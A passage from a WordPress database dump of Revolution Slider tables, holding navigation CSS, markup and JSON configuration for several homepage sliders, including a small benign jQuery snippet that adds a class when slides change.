','{\"dim\":{\"width\":\"160\",\"height\":\"160\"},\"placeholders\":{},\"presets\":{},\"version\":\"6.0.0\"}'),(2,'qodef-image-nav','qodef-image-nav','bullets','.qodef-image-nav.tp-bullets .tp-bullet{\n width: 11px;\n height: 11px;\n border-radius: 50%;\n background-color: #cccccc;\n border-color: #cccccc;\n}\n.qodef-image-nav.tp-bullets .tp-bullet.selected,\n.qodef-image-nav.tp-bullets .tp-bullet.hover{\n background-color: #fff;\n border-color: #fff;\n}','\n','{\"dim\":{\"width\":\"160\",\"height\":\"160\"},\"placeholders\":{},\"presets\":{},\"version\":\"6.0.0\"}'),(3,'qodef-pagination-2','qodef-pagination-2','bullets','.qodef-pagination-2.tp-bullets .tp-bullet{\n height: 11px;\n width: 11px;\n border-radius: 50%;\n background-color: #fff;\n}\n.qodef-pagination-2.tp-bullets .tp-bullet.selected,\n.qodef-pagination-2.tp-bullets .tp-bullet.rs-touchhover{\n background-color: #ffbea5;\n}','','{\"dim\":{\"width\":\"160\",\"height\":\"160\"},\"placeholders\":{},\"presets\":{},\"version\":\"6.0.0\"}'),(4,'qodef-pagination-3','qodef-pagination-3','bullets','.qodef-pagination-3.tp-bullets .tp-bullet{\n height: 11px;\n width: 11px;\n margin: 0 7px;\n border-radius: 50%;\n background-color: #ccc;\n}\n.qodef-pagination-3.tp-bullets .tp-bullet.selected,\n.qodef-pagination-3.tp-bullets .tp-bullet.rs-touchhover{\n background-color: #3c3c3c;\n}','','{\"dim\":{\"width\":\"160\",\"height\":\"160\"},\"placeholders\":{},\"presets\":{},\"version\":\"6.0.0\"}'); /*!40000 ALTER TABLE `wpvt_revslider_navigations` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_revslider_navigations_bkp` -- DROP TABLE IF EXISTS `wpvt_revslider_navigations_bkp`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_revslider_navigations_bkp` ( `id` int(9) NOT NULL AUTO_INCREMENT, `name` varchar(191) NOT NULL, `handle` varchar(191) NOT NULL, `type` varchar(191) NOT NULL, `css` longtext NOT NULL, `markup` longtext NOT NULL, `settings` longtext DEFAULT NULL, UNIQUE KEY `id` (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_revslider_navigations_bkp` -- LOCK TABLES `wpvt_revslider_navigations_bkp` WRITE; /*!40000 ALTER TABLE `wpvt_revslider_navigations_bkp` DISABLE KEYS */; INSERT INTO `wpvt_revslider_navigations_bkp` (`id`, `name`, `handle`, `type`, `css`, `markup`, `settings`) VALUES (1,'qodef-image-nav','qodef-image-nav','arrows','.qodef-image-nav{\n height: 70px;\n width: 105px;\n background:#fff;\n}\n.qodef-image-nav .tp-arr-allwrapper{\n position: relative;\n width: 100%;\n height: 100%;\n}\n.qodef-image-nav .tp-arr-allwrapper .tp-arr-iwrapper{\n position: relative;\n width: 100%;\n height: 100%;\n background: #fff;\n -webkit-transition:all .25s ease-out;\n transition: all .25s ease-out;\n}\n\n.qodef-image-nav:hover .tp-arr-allwrapper .tp-arr-iwrapper {\n width: 110px;\n}\n\n.qodef-image-nav.tp-rightarrow:hover .tp-arr-allwrapper .tp-arr-iwrapper {\n transform: translateX(-5px);\n}\n\n.qodef-image-nav.tparrows:hover {\nbackground-color:#fff;\n}\n\n.qodef-image-nav.tparrows:before{\n display: none;\n}\n.qodef-image-nav .tp-arr-text-holder{\n background-color: #fff;\n height: 100%;\n display: table;\n width: 105px;\n}\n.qodef-image-nav .tp-arr-text-holder span{\n display: table-cell;\n vertical-align: middle;\n box-sizing: border-box;\n font-family: Quicksand,sans-serif;\n font-weight: 700;\n color: #0f0f0f;\n font-size: 14px;\n padding-bottom: 1px;\n}\n.qodef-image-nav.tp-leftarrow .tp-arr-text-holder span{\n padding-left: 11px;\n padding-right: 24px\n}\n.qodef-image-nav.tp-leftarrow .tp-arr-text-holder span:before{\n content: \\\"\\\\34\\\";\n font-size: 22px;\n font-family: \\\'ElegantIcons\\\'!important;\n position: relative;\n top: 4px;\n}\n.qodef-image-nav.tp-rightarrow .tp-arr-text-holder span:after{\n content: \\\"\\\\35\\\";\n font-size: 22px;\n font-family: \\\'ElegantIcons\\\'!important;\n position: relative;\n top: 4px;\n}\n.qodef-image-nav.tp-rightarrow .tp-arr-text-holder span{\n padding-right: 11px;\n padding-left: 24px\n}\n.qodef-image-nav.tp-rightarrow .tp-arr-text-holder{\n position: absolute;\n left: 0;\n}\n.qodef-image-nav.tp-leftarrow .tp-arr-text-holder{\n position: absolute;\n right: 0;\n}\n\n.tparrows .numeration { \nopacity:0;\n}\n\n.qodef-rev-slider-loaded .tparrows .numeration {\n opacity:1;\n}','
\n
\n
\n {{param1}}/{{param2}}\n
\n
\n
','{\"dim\":{\"width\":\"160\",\"height\":\"160\"},\"placeholders\":{},\"presets\":{},\"version\":\"6.0.0\"}'),(2,'qodef-image-nav','qodef-image-nav','bullets','.qodef-image-nav.tp-bullets .tp-bullet{\n width: 11px;\n height: 11px;\n border-radius: 50%;\n background-color: #cccccc;\n border-color: #cccccc;\n}\n.qodef-image-nav.tp-bullets .tp-bullet.selected,\n.qodef-image-nav.tp-bullets .tp-bullet.hover{\n background-color: #fff;\n border-color: #fff;\n}','\n','{\"dim\":{\"width\":\"160\",\"height\":\"160\"},\"placeholders\":{},\"presets\":{},\"version\":\"6.0.0\"}'),(3,'qodef-pagination-2','qodef-pagination-2','bullets','.qodef-pagination-2.tp-bullets .tp-bullet{\n height: 11px;\n width: 11px;\n border-radius: 50%;\n background-color: #fff;\n}\n.qodef-pagination-2.tp-bullets .tp-bullet.selected,\n.qodef-pagination-2.tp-bullets .tp-bullet:hover{\n background-color: #ffbea5;\n}','','{\"dim\":{\"width\":\"160\",\"height\":\"160\"},\"placeholders\":{},\"presets\":{},\"version\":\"6.0.0\"}'),(4,'qodef-pagination-3','qodef-pagination-3','bullets','.qodef-pagination-3.tp-bullets .tp-bullet{\n height: 11px;\n width: 11px;\n margin: 0 7px;\n border-radius: 50%;\n background-color: #ccc;\n}\n.qodef-pagination-3.tp-bullets .tp-bullet.selected,\n.qodef-pagination-3.tp-bullets .tp-bullet:hover{\n background-color: #3c3c3c;\n}','','{\"dim\":{\"width\":\"160\",\"height\":\"160\"},\"placeholders\":{},\"presets\":{},\"version\":\"6.0.0\"}'); /*!40000 ALTER TABLE `wpvt_revslider_navigations_bkp` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_revslider_sliders` -- DROP TABLE IF EXISTS `wpvt_revslider_sliders`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_revslider_sliders` ( `id` int(9) NOT NULL AUTO_INCREMENT, `title` tinytext NOT NULL, `alias` tinytext DEFAULT NULL, `params` longtext NOT NULL, `settings` text DEFAULT NULL, `type` varchar(191) NOT NULL DEFAULT '', UNIQUE KEY `id` (`id`), KEY `type_index` (`type`(8)) ) ENGINE=MyISAM AUTO_INCREMENT=19 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_revslider_sliders` -- LOCK TABLES `wpvt_revslider_sliders` WRITE; /*!40000 ALTER TABLE `wpvt_revslider_sliders` DISABLE KEYS */; INSERT INTO `wpvt_revslider_sliders` (`id`, `title`, `alias`, `params`, `settings`, `type`) VALUES (1,'cinnamon','cinnamon','{\"id\":\"\",\"shortcode\":\"[rev_slider alias=\\\"cinnamon\\\"]\",\"layouttype\":\"auto\",\"type\":\"standard\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"addOns\":[],\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":\"55\",\"maxPosts\":\"30\",\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":\"55\",\"maxProducts\":\"30\",\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":\"1200\",\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":\"1200\",\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":\"1200\",\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":\"1200\",\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":\"1200\",\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":\"1200\",\"typeSource\":\"channel\"}},\"def\":{\"transition\":\"fade\",\"transitionDuration\":\"300\",\"delay\":\"9000\",\"background\":{\"fit\":\"cover\",\"fitX\":\"100\",\"fitY\":\"100\",\"position\":\"center center\",\"positionX\":\"0\",\"positionY\":\"0\",\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":\"0\",\"blurEnd\":\"0\",\"duration\":\"\",\"ease\":\"none\",\"fitEnd\":\"100\",\"fitStart\":\"100\",\"xEnd\":\"0\",\"yEnd\":\"0\",\"xStart\":\"0\",\"yStart\":\"0\",\"rotateStart\":\"0\",\"rotateEnd\":\"0\"}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"gridEQModule\":false,\"custom\":{\"d\":true,\"n\":true,\"t\":true,\"m\":true},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1920,\"n\":1441,\"t\":778,\"m\":480},\"height\":{\"d\":1100,\"n\":950,\"t\":960,\"m\":720},\"overflow\":false,\"maxWidth\":\"\"},\"codes\":{\"css\":\"\",\"javascript\":\"\"},\"carousel\":{\"borderRadius\":\"0\",\"borderRadiusUnit\":\"px\",\"ease\":\"power3.inOut\",\"fadeOut\":true,\"scale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":\"3\",\"maxRotation\":\"0\",\"paddingTop\":\"0\",\"paddingBottom\":\"0\",\"rotation\":false,\"scaleDown\":50,\"space\":\"0\",\"speed\":\"800\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":false},\"hero\":{\"activeSlide\":\"-1\"},\"layout\":{\"bg\":{\"color\":\"#f7f7f7\",\"padding\":\"0\",\"dottedOverlay\":\"none\",\"shadow\":\"0\",\"useImage\":false,\"image\":\"\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#FFFFFF\",\"type\":\"-1\"},\"position\":{\"marginTop\":\"0\",\"marginBottom\":\"0\",\"marginLeft\":\"0\",\"marginRight\":\"0\",\"align\":\"center\"}},\"visibility\":{\"hideSelectedLayersUnderLimit\":\"0\",\"hideAllLayersUnderLimit\":\"0\",\"hideSliderUnderLimit\":\"0\"},\"general\":{\"slideshow\":{\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":\"0\",\"stopAtSlide\":\"2\",\"shuffle\":false,\"loopSingle\":false,\"viewPort\":true,\"viewPortStart\":\"wait\",\"viewPortArea\":\"20%\",\"presetSliderHeight\":false,\"initDelay\":\"0\",\"waitForInit\":false,\"slideShow\":true},\"progressbar\":{\"set\":false,\"height\":\"5\",\"position\":\"top\",\"color\":\"rgba(0,0,0,0.15)\"},\"firstSlide\":{\"set\":false,\"duration\":\"300\",\"slotAmount\":\"7\",\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":\"1\"},\"layerSelection\":false,\"lazyLoad\":\"none\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":\"100\",\"height\":\"50\"},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":\"1\",\"velocity\":\"75\"},\"keyboard\":{\"set\":false,\"direction\":\"horizontal\"},\"mouse\":{\"set\":false,\"reverse\":\"default\"},\"arrows\":{\"set\":false,\"rtl\":false,\"style\":1000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"left\":{\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"},\"right\":{\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"}},\"thumbs\":{\"set\":false,\"rtl\":false,\"style\":2000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"tabs\":{\"set\":false,\"rtl\":false,\"style\":4000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"bullets\":{\"set\":false,\"rtl\":false,\"style\":3000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"align\":\"slider\",\"space\":\"5\",\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\"}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":\"0\",\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"alternateURLId\":false,\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"debugMode\":false,\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":false,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[\"5\",\"10\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"51\",\"55\"],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":\"65\"},\"mouse\":{\"speed\":\"400\",\"bgSpeed\":\"0\",\"layersSpeed\":\"0\",\"origo\":\"enterpoint\",\"type\":\"mouse\"}},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"maxBlur\":\"10\",\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":true,\"tilt\":\"30\",\"layers\":false},\"version\":\"6.6.0\"}','{\"version\":\"6.6.0\"}',''),(2,'Home 1','home1','{\"id\":\"\",\"shortcode\":\"[rev_slider alias=\\\\\\\"home1\\\\\\\"]\",\"layouttype\":\"fullwidth\",\"type\":\"standard\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"addOns\":[],\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":\"55\",\"maxPosts\":\"30\",\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":\"55\",\"maxProducts\":\"30\",\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":\"1200\",\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":\"1200\",\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":\"1200\",\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":\"1200\",\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":\"1200\",\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":\"1200\",\"typeSource\":\"channel\"}},\"def\":{\"transition\":\"fade\",\"transitionDuration\":\"300\",\"delay\":\"3000\",\"background\":{\"fit\":\"cover\",\"fitX\":\"100\",\"fitY\":\"100\",\"position\":\"center center\",\"positionX\":\"0\",\"positionY\":\"0\",\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":\"0\",\"blurEnd\":\"0\",\"duration\":\"\",\"ease\":\"none\",\"fitEnd\":\"100\",\"fitStart\":\"100\",\"xEnd\":\"0\",\"yEnd\":\"0\",\"xStart\":\"0\",\"yStart\":\"0\",\"rotateStart\":\"0\",\"rotateEnd\":\"0\"}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"gridEQModule\":false,\"custom\":{\"d\":true,\"n\":true,\"t\":true,\"m\":true},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1920,\"n\":1440,\"t\":778,\"m\":480},\"height\":{\"d\":655,\"n\":600,\"t\":760,\"m\":680},\"overflow\":false,\"maxWidth\":\"\"},\"codes\":{\"javascript\":\"(function($){\\n $(document).ready(function(){\\n revapi2.bind(\'revolution.slide.onchange\', function(e, data) {\\n $(\'body\').addClass(\'qodef-rev-slider-loaded\');\\n });\\n });\\n})(jQuery);\",\"css\":\"\"},\"carousel\":{\"borderRadius\":\"0\",\"borderRadiusUnit\":\"px\",\"ease\":\"power3.inOut\",\"fadeOut\":true,\"scale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":\"3\",\"maxRotation\":\"0\",\"paddingTop\":\"0\",\"paddingBottom\":\"0\",\"rotation\":false,\"scaleDown\":50,\"space\":\"0\",\"speed\":\"800\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":false},\"hero\":{\"activeSlide\":\"-1\"},\"layout\":{\"bg\":{\"color\":\"transparent\",\"padding\":\"0\",\"dottedOverlay\":\"none\",\"shadow\":\"0\",\"useImage\":false,\"image\":\"\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#FFFFFF\",\"type\":\"-1\"},\"position\":{\"marginTop\":\"0\",\"marginBottom\":\"0\",\"marginLeft\":\"0\",\"marginRight\":\"0\",\"align\":\"center\"}},\"visibility\":{\"hideSelectedLayersUnderLimit\":\"0\",\"hideAllLayersUnderLimit\":\"0\",\"hideSliderUnderLimit\":\"0\"},\"general\":{\"slideshow\":{\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":\"0\",\"stopAtSlide\":\"2\",\"shuffle\":false,\"loopSingle\":false,\"viewPort\":false,\"viewPortStart\":\"wait\",\"viewPortArea\":\"20%\",\"presetSliderHeight\":false,\"initDelay\":\"0\",\"waitForInit\":false,\"slideShow\":true},\"progressbar\":{\"set\":false,\"height\":\"5\",\"position\":\"top\",\"color\":\"rgba(0,0,0,0.15)\"},\"firstSlide\":{\"set\":false,\"duration\":\"300\",\"slotAmount\":\"7\",\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":\"1\"},\"layerSelection\":false,\"lazyLoad\":\"none\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":\"70\",\"height\":\"70\"},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":\"1\",\"velocity\":\"75\"},\"keyboard\":{\"set\":false,\"direction\":\"horizontal\"},\"mouse\":{\"set\":false,\"reverse\":\"default\"},\"arrows\":{\"set\":true,\"rtl\":false,\"style\":1,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":true,\"hideUnderLimit\":\"1024\",\"left\":{\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":\"0\",\"offsetY\":\"0\",\"align\":\"slider\"},\"right\":{\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":\"0\",\"offsetY\":\"0\",\"align\":\"slider\"}},\"thumbs\":{\"set\":false,\"rtl\":false,\"style\":2000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"tabs\":{\"set\":false,\"rtl\":false,\"style\":4000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"bullets\":{\"set\":true,\"rtl\":false,\"style\":3,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":\"0\",\"offsetY\":\"23\",\"align\":\"slider\",\"space\":\"14\",\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\"}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":\"0\",\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"alternateURLId\":false,\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"debugMode\":false,\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":true,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[\"5\",\"10\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"51\",\"55\"],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":\"65\"},\"mouse\":{\"speed\":\"400\",\"bgSpeed\":\"0\",\"layersSpeed\":\"0\",\"origo\":\"enterpoint\",\"type\":\"mouse\"}},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"maxBlur\":\"10\",\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":true,\"tilt\":\"30\",\"layers\":false},\"version\":\"6.6.0\"}','{\"version\":\"6.6.0\"}',''),(3,'Home 2','home2','{\"id\":\"\",\"shortcode\":\"[rev_slider alias=\\\\\\\"home2\\\\\\\"]\",\"layouttype\":\"fullscreen\",\"type\":\"standard\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"addOns\":[],\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":\"55\",\"maxPosts\":\"30\",\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":\"55\",\"maxProducts\":\"30\",\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":\"1200\",\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":\"1200\",\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":\"1200\",\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":\"1200\",\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":\"1200\",\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":\"1200\",\"typeSource\":\"channel\"}},\"def\":{\"transition\":\"notransition\",\"transitionDuration\":\"\",\"delay\":\"2100\",\"background\":{\"fit\":\"cover\",\"fitX\":\"100\",\"fitY\":\"100\",\"position\":\"center center\",\"positionX\":\"0\",\"positionY\":\"0\",\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":\"0\",\"blurEnd\":\"0\",\"duration\":\"\",\"ease\":\"none\",\"fitEnd\":\"100\",\"fitStart\":\"100\",\"xEnd\":\"0\",\"yEnd\":\"0\",\"xStart\":\"0\",\"yStart\":\"0\",\"rotateStart\":\"0\",\"rotateEnd\":\"0\"}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"gridEQModule\":false,\"custom\":{\"d\":true,\"n\":true,\"t\":true,\"m\":true},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1920,\"n\":1441,\"t\":778,\"m\":480},\"height\":{\"d\":868,\"n\":768,\"t\":960,\"m\":720},\"overflow\":false,\"maxWidth\":\"\"},\"codes\":{\"javascript\":\"(function($){\\n $(document).ready(function(){\\n revapi3.bind(\'revolution.slide.onchange\', function(e, data) {\\n $(\'body\').addClass(\'qodef-rev-slider-loaded\');\\n });\\n 